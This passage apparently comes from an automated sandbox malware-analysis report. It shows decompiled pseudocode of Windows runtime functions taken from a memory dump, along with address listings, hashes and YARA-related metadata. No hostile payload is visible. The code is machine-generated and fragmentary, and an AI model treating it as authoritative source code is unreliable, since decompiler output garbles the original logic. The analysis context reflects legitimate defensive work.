				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E013453CA(0);
						return E0131D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0130F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E012E3690(1, _t117, 0x12a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0130AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L012E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0130AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0134500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01309860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                            0x013451be
                                                            0x013451c3
                                                            0x013451c8
                                                            0x013451cd
                                                            0x013451d0
                                                            0x013451d3
                                                            0x013451d8
                                                            0x013451db
                                                            0x013451de
                                                            0x013451e0
                                                            0x013451e3
                                                            0x013451e6
                                                            0x013451e8
                                                            0x01345342
                                                            0x01345351
                                                            0x01345356
                                                            0x0134535a
                                                            0x01345360
                                                            0x01345363
                                                            0x01345366
                                                            0x01345369
                                                            0x01345369
                                                            0x0134536b
                                                            0x0134536b
                                                            0x01345370
                                                            0x013453a3
                                                            0x013453a4
                                                            0x013453a6
                                                            0x013453ab
                                                            0x013453ab
                                                            0x013453ae
                                                            0x013453ae
                                                            0x013453b5
                                                            0x013453bf
                                                            0x013453bf
                                                            0x01345375
                                                            0x01345396
                                                            0x013453a0
                                                            0x013453a0
                                                            0x00000000
                                                            0x01345396
                                                            0x01345377
                                                            0x01345379
                                                            0x0134537f
                                                            0x0134538c
                                                            0x01345390
                                                            0x00000000
                                                            0x01345390
                                                            0x013451ee
                                                            0x013451f1
                                                            0x01345301
                                                            0x01345310
                                                            0x01345315
                                                            0x01345318
                                                            0x0134531b
                                                            0x01345320
                                                            0x0134532e
                                                            0x01345331
                                                            0x00000000
                                                            0x01345331
                                                            0x01345328
                                                            0x01345329
                                                            0x00000000
                                                            0x01345329
                                                            0x013451fa
                                                            0x01345235
                                                            0x01345236
                                                            0x01345239
                                                            0x0134523f
                                                            0x01345240
                                                            0x01345241
                                                            0x01345242
                                                            0x01345246
                                                            0x01345247
                                                            0x0134524e
                                                            0x01345251
                                                            0x01345267
                                                            0x01345269
                                                            0x0134526e
                                                            0x0134527d
                                                            0x0134527e
                                                            0x01345281
                                                            0x01345282
                                                            0x01345287
                                                            0x01345288
                                                            0x0134528a
                                                            0x0134528f
                                                            0x01345294
                                                            0x00000000
                                                            0x00000000
                                                            0x0134529a
                                                            0x0134529c
                                                            0x0134529e
                                                            0x0134529e
                                                            0x013452a4
                                                            0x013452b0
                                                            0x00000000
                                                            0x00000000
                                                            0x013452ba
                                                            0x013452bc
                                                            0x013452bc
                                                            0x013452d4
                                                            0x013452d9
                                                            0x013452dc
                                                            0x013452e1
                                                            0x00000000
                                                            0x00000000
                                                            0x013452e7
                                                            0x013452f4
                                                            0x00000000
                                                            0x013452f4
                                                            0x01345270
                                                            0x00000000
                                                            0x01345270
                                                            0x013451fc
                                                            0x013451fd
                                                            0x01345202
                                                            0x01345203
                                                            0x01345205
                                                            0x0134520a
                                                            0x0134520f
                                                            0x00000000
                                                            0x00000000
                                                            0x0134521b
                                                            0x01345226
                                                            0x0134522b
                                                            0x0134521d
                                                            0x0134521d
                                                            0x01345222
                                                            0x01345222
                                                            0x0134522d
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • Opcode ID: a9b9867d55d8e2ca1a3c31e3ff491f79da35ef70d32e788c02e3b47eafd8f722
                                                            • Instruction ID: f8bb6fad4bbfacba8d9ea7429b6a35423e2a7c85cc473b466d8d2e75a4631a06
                                                            • Opcode Fuzzy Hash: a9b9867d55d8e2ca1a3c31e3ff491f79da35ef70d32e788c02e3b47eafd8f722
                                                            • Instruction Fuzzy Hash: 40515C71E006099FDB25DFA8C850BAEBBF8FF48708F14406EE649EB291D671A940CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012CB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E012CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x139f7a8);
				E0131D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0131D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0130D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0130F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0131DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0130B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0130B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0130E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0130A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                            0x012cb171
                                                            0x012cb171
                                                            0x012cb171
                                                            0x012cb171
                                                            0x012cb171
                                                            0x012cb176
                                                            0x012cb17b
                                                            0x012cb180
                                                            0x012cb186
                                                            0x012cb18f
                                                            0x012cb198
                                                            0x012cb1a4
                                                            0x012cb1aa
                                                            0x01324802
                                                            0x01324802
                                                            0x01324805
                                                            0x0132480c
                                                            0x0132480e
                                                            0x012cb1d1
                                                            0x012cb1d3
                                                            0x012cb1de
                                                            0x012cb1de
                                                            0x01324817
                                                            0x0132481e
                                                            0x01324820
                                                            0x01324822
                                                            0x01324822
                                                            0x01324824
                                                            0x01324824
                                                            0x0132482a
                                                            0x00000000
                                                            0x00000000
                                                            0x01324835
                                                            0x0132483a
                                                            0x0132483d
                                                            0x0132483f
                                                            0x01324842
                                                            0x01324842
                                                            0x01324842
                                                            0x01324846
                                                            0x0132484c
                                                            0x0132484e
                                                            0x01324851
                                                            0x01324851
                                                            0x01324853
                                                            0x01324854
                                                            0x01324854
                                                            0x01324858
                                                            0x0132485a
                                                            0x0132485a
                                                            0x0132485d
                                                            0x0132485f
                                                            0x01324861
                                                            0x01324861
                                                            0x01324866
                                                            0x0132486b
                                                            0x0132486e
                                                            0x01324871
                                                            0x01324876
                                                            0x01324876
                                                            0x01324878
                                                            0x0132487b
                                                            0x01324884
                                                            0x01324884
                                                            0x00000000
                                                            0x0132487d
                                                            0x0132487d
                                                            0x01324882
                                                            0x01324889
                                                            0x01324889
                                                            0x0132488f
                                                            0x01324891
                                                            0x013248e0
                                                            0x013248e2
                                                            0x013248e4
                                                            0x013248e4
                                                            0x013248e7
                                                            0x013248e7
                                                            0x013248ed
                                                            0x013248f4
                                                            0x013248f6
                                                            0x01324951
                                                            0x01324951
                                                            0x01324953
                                                            0x01324953
                                                            0x01324956
                                                            0x01324956
                                                            0x01324958
                                                            0x01324959
                                                            0x01324959
                                                            0x0132495d
                                                            0x0132495d
                                                            0x0132495f
                                                            0x0132495f
                                                            0x01324965
                                                            0x01324969
                                                            0x013249ba
                                                            0x013249ba
                                                            0x013249c1
                                                            0x013249c5
                                                            0x013249cc
                                                            0x013249d4
                                                            0x013249d7
                                                            0x013249da
                                                            0x013249e4
                                                            0x013249e5
                                                            0x013249f3
                                                            0x01324a02
                                                            0x00000000
                                                            0x01324a02
                                                            0x01324972
                                                            0x01324974
                                                            0x00000000
                                                            0x00000000
                                                            0x01324976
                                                            0x01324979
                                                            0x01324982
                                                            0x01324983
                                                            0x01324984
                                                            0x0132498b
                                                            0x0132498d
                                                            0x01324991
                                                            0x01324993
                                                            0x01324999
                                                            0x0132499d
                                                            0x013249a2
                                                            0x013249a2
                                                            0x013249a2
                                                            0x01324999
                                                            0x013249ac
                                                            0x00000000
                                                            0x013249b3
                                                            0x013248f8
                                                            0x013248fe
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x013248fe
                                                            0x01324895
                                                            0x0132489c
                                                            0x013248ad
                                                            0x013248b2
                                                            0x013248b5
                                                            0x013248b7
                                                            0x013248ba
                                                            0x013248bc
                                                            0x013248c6
                                                            0x013248c6
                                                            0x013248cb
                                                            0x013248d1
                                                            0x013248d4
                                                            0x013248d8
                                                            0x013248d8
                                                            0x00000000
                                                            0x013248d8
                                                            0x013248be
                                                            0x013248c0
                                                            0x00000000
                                                            0x00000000
                                                            0x013248c2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x013248c4
                                                            0x00000000
                                                            0x01324882
                                                            0x0132487b
                                                            0x01324904
                                                            0x01324906
                                                            0x00000000
                                                            0x00000000
                                                            0x01324908
                                                            0x0132490e
                                                            0x00000000
                                                            0x00000000
                                                            0x01324910
                                                            0x01324917
                                                            0x01324917
                                                            0x00000000
                                                            0x01324917
                                                            0x012cb1ba
                                                            0x013247f9
                                                            0x013247fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x013247fc
                                                            0x012cb1c0
                                                            0x012cb1c0
                                                            0x012cb1c3
                                                            0x012cb1cb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: _vswprintf_s
                                                            • String ID:
                                                            • API String ID: 677850445-0
                                                            • Opcode ID: 1104533c29dff7a59aa7742328d8eaac57ab002309f6a99db110a7020049fddb
                                                            • Instruction ID: d9aa9a896df3bc0f9f84475bc009d63403072c9a076f19b440f6e4cba6ec5147
                                                            • Opcode Fuzzy Hash: 1104533c29dff7a59aa7742328d8eaac57ab002309f6a99db110a7020049fddb
                                                            • Instruction Fuzzy Hash: 7B51F371E102698EDB36EF68C845BBEBFF0AF01718F1041ADD959AB282D7B14941CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012EB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 76%
                                                            			E012EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x13bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E012E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01398CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01309E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0130B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0130CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E012E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01398F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0130AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x13b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x13b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x13b8628; // 0x0
							_t116 =  *0x13b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                            0x012eb94c
                                                            0x012eb956
                                                            0x012eb95c
                                                            0x012eb95e
                                                            0x012eb964
                                                            0x012eb969
                                                            0x012eb96d
                                                            0x012eb96d
                                                            0x012eb970
                                                            0x012eb974
                                                            0x012eb97a
                                                            0x012ebadf
                                                            0x012ebadf
                                                            0x012ebae2
                                                            0x012ebae4
                                                            0x012ebae6
                                                            0x012ebaf0
                                                            0x01332cb8
                                                            0x012ebaf6
                                                            0x012ebaf6
                                                            0x012ebaf6
                                                            0x012ebafd
                                                            0x012ebb1f
                                                            0x012ebb1f
                                                            0x012ebaff
                                                            0x012ebb00
                                                            0x012ebb00
                                                            0x012ebb03
                                                            0x012ebb03
                                                            0x012ebacb
                                                            0x012ebacf
                                                            0x012ebad0
                                                            0x012ebad1
                                                            0x012ebadc
                                                            0x012ebadc
                                                            0x012eb980
                                                            0x012eb980
                                                            0x012eb988
                                                            0x012eb98b
                                                            0x012eb98d
                                                            0x012eb990
                                                            0x012eb993
                                                            0x012eb999
                                                            0x012eb99b
                                                            0x012eb9a1
                                                            0x012eb9a5
                                                            0x012eb9aa
                                                            0x012eb9b0
                                                            0x012eb9bb
                                                            0x012eb9c0
                                                            0x012eb9c3
                                                            0x012eb9ca
                                                            0x012eb9cc
                                                            0x012eb9cf
                                                            0x012eb9d3
                                                            0x012eb9d7
                                                            0x012eba94
                                                            0x012eba94
                                                            0x012eba98
                                                            0x012ebaa3
                                                            0x01332ccb
                                                            0x012ebaa9
                                                            0x012ebaa9
                                                            0x012ebaa9
                                                            0x012ebab1
                                                            0x01332cd5
                                                            0x01332cdd
                                                            0x01332cdd
                                                            0x012ebabb
                                                            0x012ebabc
                                                            0x012ebac2
                                                            0x012ebac3
                                                            0x012ebac3
                                                            0x012ebac6
                                                            0x00000000
                                                            0x012eb9dd
                                                            0x012eb9dd
                                                            0x012eb9e7
                                                            0x012eb9e7
                                                            0x012eb9ec
                                                            0x012eb9ec
                                                            0x012eb9f1
                                                            0x012eb9f5
                                                            0x012eb9fa
                                                            0x012eba00
                                                            0x012eba0c
                                                            0x012eba10
                                                            0x012eba10
                                                            0x012eba12
                                                            0x012eba18
                                                            0x00000000
                                                            0x00000000
                                                            0x012ebb26
                                                            0x012ebb26
                                                            0x012eba1e
                                                            0x012eba1e
                                                            0x012eba23
                                                            0x012eba25
                                                            0x012eba2c
                                                            0x012eba30
                                                            0x012eba35
                                                            0x012eba35
                                                            0x012eba41
                                                            0x012eba46
                                                            0x012eba4c
                                                            0x012eba50
                                                            0x012eba54
                                                            0x012eba6a
                                                            0x012eba6e
                                                            0x012eba70
                                                            0x012eba74
                                                            0x012eba78
                                                            0x012eba7a
                                                            0x012eba7c
                                                            0x012eba8e
                                                            0x012eba90
                                                            0x012eba92
                                                            0x012ebb14
                                                            0x012ebb14
                                                            0x012ebb16
                                                            0x012ebb16
                                                            0x00000000
                                                            0x012eba7c
                                                            0x012ebb0a
                                                            0x012ebb0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x012ebb0f

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012EB9A5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 885266447-0
                                                            • Opcode ID: 3e10875ffae5b50b9ac962f9e799d1dc72e304fdc0de074272fa0ee5e8137412
                                                            • Instruction ID: f68a8321058d559eb4c4005466a505af6c95468f5e3cf4c833db6b574fd7193c
                                                            • Opcode Fuzzy Hash: 3e10875ffae5b50b9ac962f9e799d1dc72e304fdc0de074272fa0ee5e8137412
                                                            • Instruction Fuzzy Hash: 31516A71A28341CFCB21CF2DC0C492ABBE9FB88614F54496EEA8587355E770E844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E012F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				signed int* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				signed int _t343;
				void* _t344;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x13bd360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x13bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
